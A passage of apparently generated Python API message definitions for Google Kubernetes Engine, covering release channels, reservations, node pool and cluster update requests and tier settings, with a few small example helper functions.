window and when it first starts. The FREQ values of HOURLY, MINUTELY,
and SECONDLY are not supported.
window: The window of the first recurrence.
"""
recurrence = _messages.StringField(1)
window = _messages.MessageField('TimeWindow', 2)
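# Illustrative sketch, not part of the generated API surface: the RRULE
# semantics documented above, expressed as a concrete message. The keyword
# constructor is assumed from the protorpc-style messages in this module, and
# the timestamps are the ones used in the docstring example. TimeWindow is
# defined later in this module; the name is resolved at call time.
def _example_recurring_weekday_window():
  """The 9-5 UTC-4 weekday window from the RecurringTimeWindow docstring."""
  return RecurringTimeWindow(
      recurrence='FREQ=WEEKLY;BYDAY=MO,TU,WE,TH,FR',
      window=TimeWindow(
          startTime='2019-01-01T09:00:00-0400',
          endTime='2019-01-01T17:00:00-0400'))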
class ReleaseChannel(_messages.Message):
r"""ReleaseChannel indicates which release channel a cluster is subscribed
to. Release channels are arranged in order of risk and frequency of updates.
When a cluster is subscribed to a release channel, Google maintains both the
master version and the node version. Node auto-upgrade defaults to true and
cannot be disabled. Updates to version related fields (e.g.
current_master_version) return an error.
Enums:
ChannelValueValuesEnum: channel specifies which release channel the
cluster is subscribed to.
Fields:
channel: channel specifies which release channel the cluster is subscribed
to.
"""
class ChannelValueValuesEnum(_messages.Enum):
r"""channel specifies which release channel the cluster is subscribed to.
Values:
UNSPECIFIED: No channel specified.
RAPID: RAPID channel is offered on an early access basis for customers
who want to test new releases before they are qualified for production
use or general availability. New upgrades will occur roughly weekly.
WARNING: Versions available in the RAPID Channel may be subject to
unresolved issues with no known workaround and are not for use with
production workloads or subject to any SLAs.
REGULAR: Clusters subscribed to REGULAR receive versions that are
considered GA quality. REGULAR is intended for production users who
want to take advantage of new features. New upgrades will occur
roughly every few weeks.
STABLE: Clusters subscribed to STABLE receive versions that are known to
be stable and reliable in production. STABLE is intended for
production users who need stability above all else, or for whom
frequent upgrades are too risky. New upgrades will occur roughly every
few months.
"""
UNSPECIFIED = 0
RAPID = 1
REGULAR = 2
STABLE = 3
channel = _messages.EnumField('ChannelValueValuesEnum', 1)
class ReleaseChannelConfig(_messages.Message):
r"""ReleaseChannelConfig exposes configuration for a release channel.
Enums:
ChannelValueValuesEnum: The release channel this configuration applies to.
Fields:
availableVersions: List of available versions for the release channel.
channel: The release channel this configuration applies to.
defaultVersion: The default version for newly created clusters on the
channel.
"""
class ChannelValueValuesEnum(_messages.Enum):
r"""The release channel this configuration applies to.
Values:
UNSPECIFIED: No channel specified.
RAPID: RAPID channel is offered on an early access basis for customers
who want to test new releases before they are qualified for production
use or general availability. New upgrades will occur roughly weekly.
WARNING: Versions available in the RAPID Channel may be subject to
unresolved issues with no known workaround and are not for use with
production workloads or subject to any SLAs.
REGULAR: Clusters subscribed to REGULAR receive versions that are
considered GA quality. REGULAR is intended for production users who
want to take advantage of new features. New upgrades will occur
roughly every few weeks.
STABLE: Clusters subscribed to STABLE receive versions that are known to
be stable and reliable in production. STABLE is intended for
production users who need stability above all else, or for whom
frequent upgrades are too risky. New upgrades will occur roughly every
few months.
"""
UNSPECIFIED = 0
RAPID = 1
REGULAR = 2
STABLE = 3
availableVersions = _messages.MessageField('AvailableVersion', 1, repeated=True)
channel = _messages.EnumField('ChannelValueValuesEnum', 2)
defaultVersion = _messages.StringField(3)
class ReservationAffinity(_messages.Message):
r"""[ReservationAffinity](/compute/docs/instances/reserving-zonal-resources)
is the configuration of desired reservation which instances could take
capacity from.
Enums:
ConsumeReservationTypeValueValuesEnum: Corresponds to the type of
reservation consumption.
Fields:
consumeReservationType: Corresponds to the type of reservation
consumption.
key: Corresponds to the label key of a reservation resource. To target a
SPECIFIC_RESERVATION by name, specify "googleapis.com/reservation-name"
as the key and specify the name of your reservation as its value.
values: Corresponds to the label value(s) of reservation resource(s).
"""
class ConsumeReservationTypeValueValuesEnum(_messages.Enum):
r"""Corresponds to the type of reservation consumption.
Values:
UNSPECIFIED: Default value. This should not be used.
NO_RESERVATION: Do not consume from any reserved capacity.
ANY_RESERVATION: Consume any reservation available.
SPECIFIC_RESERVATION: Must consume from a specific reservation. Must
specify key value fields for specifying the reservations.
"""
UNSPECIFIED = 0
NO_RESERVATION = 1
ANY_RESERVATION = 2
SPECIFIC_RESERVATION = 3
consumeReservationType = _messages.EnumField('ConsumeReservationTypeValueValuesEnum', 1)
key = _messages.StringField(2)
values = _messages.StringField(3, repeated=True)
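# Illustrative sketch, not part of the generated API surface: targeting a
# named reservation using the key documented above. The reservation name is a
# placeholder and the keyword constructor is assumed from the protorpc-style
# messages in this module.
def _example_specific_reservation_affinity():
  """Consume capacity only from a reservation named 'my-reservation'."""
  enum = ReservationAffinity.ConsumeReservationTypeValueValuesEnum
  return ReservationAffinity(
      consumeReservationType=enum.SPECIFIC_RESERVATION,
      key='googleapis.com/reservation-name',
      values=['my-reservation'])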
class ResourceLimit(_messages.Message):
r"""Contains information about amount of some resource in the cluster. For
memory, value should be in GB.
Fields:
maximum: Maximum amount of the resource in the cluster.
minimum: Minimum amount of the resource in the cluster.
resourceType: Resource name "cpu", "memory" or gpu-specific string.
"""
maximum = _messages.IntegerField(1)
minimum = _messages.IntegerField(2)
resourceType = _messages.StringField(3)
class ResourceUsageExportConfig(_messages.Message):
r"""Configuration for exporting cluster resource usages.
Fields:
bigqueryDestination: Configuration to use BigQuery as usage export
destination.
consumptionMeteringConfig: Configuration to enable resource consumption
metering.
enableNetworkEgressMetering: Whether to enable network egress metering for
this cluster. If enabled, a daemonset will be created in the cluster to
meter network egress traffic.
"""
bigqueryDestination = _messages.MessageField('BigQueryDestination', 1)
consumptionMeteringConfig = _messages.MessageField('ConsumptionMeteringConfig', 2)
enableNetworkEgressMetering = _messages.BooleanField(3)
class RollbackNodePoolUpgradeRequest(_messages.Message):
r"""RollbackNodePoolUpgradeRequest rollbacks the previously Aborted or
Failed NodePool upgrade. This will be an no-op if the last upgrade
successfully completed.
Fields:
clusterId: Deprecated. The name of the cluster to rollback. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to rollback upgrade. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to rollback. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SandboxConfig(_messages.Message):
r"""SandboxConfig contains configurations of the sandbox to use for the
node.
Enums:
TypeValueValuesEnum: Type of the sandbox to use for the node.
Fields:
sandboxType: Type of the sandbox to use for the node (e.g. 'gvisor')
type: Type of the sandbox to use for the node.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Type of the sandbox to use for the node.
Values:
UNSPECIFIED: Default value. This should not be used.
GVISOR: Run sandbox using gvisor.
"""
UNSPECIFIED = 0
GVISOR = 1
sandboxType = _messages.StringField(1)
type = _messages.EnumField('TypeValueValuesEnum', 2)
class SecurityProfile(_messages.Message):
r"""User selected security profile
Fields:
disableRuntimeRules: Don't apply runtime rules. When set to true, no
objects/deployments will be installed in the cluster to enforce runtime
rules. This is useful when working with config-as-code systems.
name: Name and version of the selected security profile. A security profile
name follows kebab-case (a-zA-Z*) and a version has the form MAJOR.MINOR-
suffix, where suffix matches ([a-zA-Z0-9\-_\.]+), e.g. default-1.0-gke.0
"""
disableRuntimeRules = _messages.BooleanField(1)
name = _messages.StringField(2)
class ServerConfig(_messages.Message):
r"""Kubernetes Engine service configuration.
Fields:
channels: List of release channel configurations.
defaultClusterVersion: Version of Kubernetes the service deploys by
default.
defaultImageType: Default image type.
premiumConfig: Premium configuration for the service.
validImageTypes: List of valid image types.
validMasterVersions: List of valid master versions.
validNodeVersions: List of valid node upgrade target versions.
"""
channels = _messages.MessageField('ReleaseChannelConfig', 1, repeated=True)
defaultClusterVersion = _messages.StringField(2)
defaultImageType = _messages.StringField(3)
premiumConfig = _messages.MessageField('PremiumConfig', 4)
validImageTypes = _messages.StringField(5, repeated=True)
validMasterVersions = _messages.StringField(6, repeated=True)
validNodeVersions = _messages.StringField(7, repeated=True)
class SetAddonsConfigRequest(_messages.Message):
r"""SetAddonsRequest sets the addons associated with the cluster.
Fields:
addonsConfig: The desired configurations for the various addons available
to run in the cluster.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to set addons.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
addonsConfig = _messages.MessageField('AddonsConfig', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLabelsRequest(_messages.Message):
r"""SetLabelsRequest sets the Google Cloud Platform labels on a Google
Container Engine cluster, which will in turn set them for Google Compute
Engine resources used by that cluster
Messages:
ResourceLabelsValue: The labels to set for that cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
labelFingerprint: The fingerprint of the previous set of labels for this
resource, used to detect conflicts. The fingerprint is initially
generated by Kubernetes Engine and changes after every request to modify
or update labels. You must always provide an up-to-date fingerprint hash
when updating or changing labels. Make a <code>get()</code> request to
the resource to get the latest fingerprint.
name: The name (project, location, cluster id) of the cluster to set
labels. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
resourceLabels: The labels to set for that cluster.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class ResourceLabelsValue(_messages.Message):
r"""The labels to set for that cluster.
Messages:
AdditionalProperty: An additional property for a ResourceLabelsValue
object.
Fields:
additionalProperties: Additional properties of type ResourceLabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResourceLabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
clusterId = _messages.StringField(1)
labelFingerprint = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
resourceLabels = _messages.MessageField('ResourceLabelsValue', 5)
zone = _messages.StringField(6)
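# Illustrative sketch, not part of the generated API surface: the
# ResourceLabelsValue map is built from repeated AdditionalProperty entries,
# as the nested message definitions above imply. The label keys/values and
# the helper name are placeholders; the keyword constructor is assumed.
def _example_set_labels_request(name, fingerprint):
  """Builds a request that sets env=prod and team=infra on a cluster."""
  labels_value = SetLabelsRequest.ResourceLabelsValue(additionalProperties=[
      SetLabelsRequest.ResourceLabelsValue.AdditionalProperty(
          key='env', value='prod'),
      SetLabelsRequest.ResourceLabelsValue.AdditionalProperty(
          key='team', value='infra'),
  ])
  return SetLabelsRequest(
      name=name, labelFingerprint=fingerprint, resourceLabels=labels_value)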
class SetLegacyAbacRequest(_messages.Message):
r"""SetLegacyAbacRequest enables or disables the ABAC authorization
mechanism for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
enabled: Whether ABAC authorization will be enabled in the cluster.
name: The name (project, location, cluster id) of the cluster to set
legacy abac. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
enabled = _messages.BooleanField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLocationsRequest(_messages.Message):
r"""SetLocationsRequest sets the locations of the cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
locations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located. Changing the locations a cluster is in will result in
nodes being either created or removed from the cluster, depending on
whether locations are being added or removed. This list must always
include the cluster's primary zone.
name: The name (project, location, cluster) of the cluster to set
locations. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
locations = _messages.StringField(2, repeated=True)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetLoggingServiceRequest(_messages.Message):
r"""SetLoggingServiceRequest sets the logging service of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
loggingService: The logging service the cluster should use to write
logs. Currently available options: * "logging.googleapis.com" - the
Google Cloud Logging service * "none" - no logs will be exported from
the cluster
name: The name (project, location, cluster) of the cluster to set logging.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
loggingService = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetMaintenancePolicyRequest(_messages.Message):
r"""SetMaintenancePolicyRequest sets the maintenance policy for a cluster.
Fields:
clusterId: The name of the cluster to update.
maintenancePolicy: The maintenance policy to be set for the cluster. An
empty field clears the existing maintenance policy.
name: The name (project, location, cluster id) of the cluster to set
maintenance policy. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: The Google Developers Console [project ID or project
number](https://support.google.com/cloud/answer/6158840).
zone: The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides.
"""
clusterId = _messages.StringField(1)
maintenancePolicy = _messages.MessageField('MaintenancePolicy', 2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetMasterAuthRequest(_messages.Message):
r"""SetMasterAuthRequest updates the admin password of a cluster.
Enums:
ActionValueValuesEnum: The exact form of action to be taken on the master
auth.
Fields:
action: The exact form of action to be taken on the master auth.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to set auth.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
update: A description of the update.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
class ActionValueValuesEnum(_messages.Enum):
r"""The exact form of action to be taken on the master auth.
Values:
UNKNOWN: Operation is unknown and will error out.
SET_PASSWORD: Set the password to a user generated value.
GENERATE_PASSWORD: Generate a new password and set it to that.
SET_USERNAME: Set the username. If an empty username is provided, basic
authentication is disabled for the cluster. If a non-empty username
is provided, basic authentication is enabled, with either a provided
password or a generated one.
"""
UNKNOWN = 0
SET_PASSWORD = 1
GENERATE_PASSWORD = 2
SET_USERNAME = 3
action = _messages.EnumField('ActionValueValuesEnum', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
update = _messages.MessageField('MasterAuth', 5)
zone = _messages.StringField(6)
class SetMonitoringServiceRequest(_messages.Message):
r"""SetMonitoringServiceRequest sets the monitoring service of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
monitoringService: The monitoring service the cluster should use to write
metrics. Currently available options: * "monitoring.googleapis.com" -
the Google Cloud Monitoring service * "none" - no metrics will be
exported from the cluster
name: The name (project, location, cluster) of the cluster to set
monitoring. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
monitoringService = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetNetworkPolicyRequest(_messages.Message):
r"""SetNetworkPolicyRequest enables/disables network policy for a cluster.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to set
networking policy. Specified in the format
'projects/*/locations/*/clusters/*'.
networkPolicy: Configuration options for the NetworkPolicy feature.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
networkPolicy = _messages.MessageField('NetworkPolicy', 3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class SetNodePoolAutoscalingRequest(_messages.Message):
r"""SetNodePoolAutoscalingRequest sets the autoscaler settings of a node
pool.
Fields:
autoscaling: Autoscaling configuration for the node pool.
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool) of the node pool to
set autoscaler settings. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to upgrade. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
autoscaling = _messages.MessageField('NodePoolAutoscaling', 1)
clusterId = _messages.StringField(2)
name = _messages.StringField(3)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class SetNodePoolManagementRequest(_messages.Message):
r"""SetNodePoolManagementRequest sets the node management properties of a
node pool.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
management: NodeManagement configuration for the node pool.
name: The name (project, location, cluster, node pool id) of the node pool
to set management properties. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to update. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
management = _messages.MessageField('NodeManagement', 2)
name = _messages.StringField(3)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class SetNodePoolSizeRequest(_messages.Message):
r"""SetNodePoolSizeRequest sets the size a node pool.
Fields:
clusterId: Deprecated. The name of the cluster to update. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to set size. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodeCount: The desired node count for the pool.
nodePoolId: Deprecated. The name of the node pool to update. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840).
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
nodeCount = _messages.IntegerField(3, variant=_messages.Variant.INT32)
nodePoolId = _messages.StringField(4)
projectId = _messages.StringField(5)
zone = _messages.StringField(6)
class ShieldedInstanceConfig(_messages.Message):
r"""A set of Shielded Instance options.
Fields:
enableIntegrityMonitoring: Defines whether the instance has integrity
monitoring enabled.
enableSecureBoot: Defines whether the instance has Secure Boot enabled.
"""
enableIntegrityMonitoring = _messages.BooleanField(1)
enableSecureBoot = _messages.BooleanField(2)
class ShieldedNodes(_messages.Message):
r"""Configuration of Shielded Nodes feature.
Fields:
enabled: Whether Shielded Nodes features are enabled on all nodes in this
cluster.
"""
enabled = _messages.BooleanField(1)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default=u'json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
class StartIPRotationRequest(_messages.Message):
r"""StartIPRotationRequest creates a new IP for the cluster and then
performs a node upgrade on each node pool to point to the new IP.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to start IP
rotation. Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
rotateCredentials: Whether to rotate credentials during IP rotation.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
rotateCredentials = _messages.BooleanField(4)
zone = _messages.StringField(5)
class StatusCondition(_messages.Message):
r"""StatusCondition describes why a cluster or a node pool has a certain
status (e.g., ERROR or DEGRADED).
Enums:
CodeValueValuesEnum: Machine-friendly representation of the condition
Fields:
code: Machine-friendly representation of the condition
message: Human-friendly representation of the condition
"""
class CodeValueValuesEnum(_messages.Enum):
r"""Machine-friendly representation of the condition
Values:
UNKNOWN: UNKNOWN indicates a generic condition.
GCE_STOCKOUT: GCE_STOCKOUT indicates that Google Compute Engine
resources are temporarily unavailable.
GKE_SERVICE_ACCOUNT_DELETED: GKE_SERVICE_ACCOUNT_DELETED indicates that
the user deleted their robot service account.
GCE_QUOTA_EXCEEDED: Google Compute Engine quota was exceeded.
SET_BY_OPERATOR: Cluster state was manually changed by an SRE due to a
system logic error.
CLOUD_KMS_KEY_ERROR: Unable to perform an encrypt operation against the
CloudKMS key used for etcd level encryption. More codes TBA
"""
UNKNOWN = 0
GCE_STOCKOUT = 1
GKE_SERVICE_ACCOUNT_DELETED = 2
GCE_QUOTA_EXCEEDED = 3
SET_BY_OPERATOR = 4
CLOUD_KMS_KEY_ERROR = 5
code = _messages.EnumField('CodeValueValuesEnum', 1)
message = _messages.StringField(2)
class TierConfig(_messages.Message):
r"""TierConfig is the configuration for a tier offering. For example the
GKE standard or advanced offerings which contain different levels of
functionality and possibly cost.
Enums:
ParentValueValuesEnum: The tier from which the tier being configured
inherits. The configured tier will inherit all the features from its
parent tier.
TierValueValuesEnum: The tier that is being configured with this value.
Fields:
parent: The tier from which the tier being configured inherits. The
configured tier will inherit all the features from its parent tier.
tier: The tier that is being configured with this value.
"""
class ParentValueValuesEnum(_messages.Enum):
r"""The tier from which the tier being configured inherits. The
configured tier will inherit all the features from its parent tier.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
class TierValueValuesEnum(_messages.Enum):
r"""The tier that is being configured with this value.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
parent = _messages.EnumField('ParentValueValuesEnum', 1)
tier = _messages.EnumField('TierValueValuesEnum', 2)
class TierSettings(_messages.Message):
r"""Cluster tier settings.
Enums:
TierValueValuesEnum: Cluster tier.
Fields:
tier: Cluster tier.
"""
class TierValueValuesEnum(_messages.Enum):
r"""Cluster tier.
Values:
TIER_UNSPECIFIED: TIER_UNSPECIFIED is the default value. If this value
is set during create or update, it defaults to the project level tier
setting.
STANDARD: Represents the standard tier or base Google Kubernetes Engine
offering.
ADVANCED: Represents the advanced tier.
"""
TIER_UNSPECIFIED = 0
STANDARD = 1
ADVANCED = 2
tier = _messages.EnumField('TierValueValuesEnum', 1)
class TimeWindow(_messages.Message):
r"""Represents an arbitrary window of time.
Fields:
endTime: The time that the window ends. The end time should take place
after the start time.
startTime: The time that the window first starts.
"""
endTime = _messages.StringField(1)
startTime = _messages.StringField(2)
class UpdateClusterRequest(_messages.Message):
r"""UpdateClusterRequest updates the settings of a cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to update.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
update: A description of the update.
updatedCluster: The updated cluster object. This field must be empty if
'update' is set.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
update = _messages.MessageField('ClusterUpdate', 4)
updatedCluster = _messages.MessageField('Cluster', 5)
zone = _messages.StringField(6)
class UpdateMasterRequest(_messages.Message):
r"""UpdateMasterRequest updates the master of the cluster.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
masterVersion: The Kubernetes version to change the master to. Users may
specify either explicit versions offered by Kubernetes Engine or version
aliases, which have the following behavior: - "latest": picks the
highest valid Kubernetes version - "1.X": picks the highest valid
patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest valid
gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an explicit
Kubernetes version - "-": picks the default Kubernetes version
name: The name (project, location, cluster) of the cluster to update.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840).
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
masterVersion = _messages.StringField(2)
name = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
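# Illustrative sketch, not part of the generated API surface: the version
# aliases documented above ("latest", "1.X", "1.X.Y", "1.X.Y-gke.N", "-")
# are passed verbatim in masterVersion. The cluster name is a placeholder
# argument and the keyword constructor is assumed.
def _example_update_master_to_default(cluster_name):
  """Requests a master upgrade to the default Kubernetes version ("-")."""
  return UpdateMasterRequest(name=cluster_name, masterVersion='-')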
class UpdateNodePoolRequest(_messages.Message):
r"""SetNodePoolVersionRequest updates the version of a node pool.
Fields:
clusterId: Deprecated. The name of the cluster to upgrade. This field has
been deprecated and replaced by the name field.
image: The desired name of the image to use for this node. This is
used to create clusters using a custom image.
imageProject: The project containing the desired image to use for this
node pool. This is used to create clusters using a custom image.
imageType: The desired image type for the node pool.
locations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the node pool's nodes
should be located. Changing the locations for a node pool will result in
nodes being either created or removed from the node pool, depending on
whether locations are being added or removed.
name: The name (project, location, cluster, node pool) of the node pool to
update. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to upgrade. This field
has been deprecated and replaced by the name field.
nodeVersion: The Kubernetes version to change the nodes to (typically an
upgrade). Users may specify either explicit versions offered by
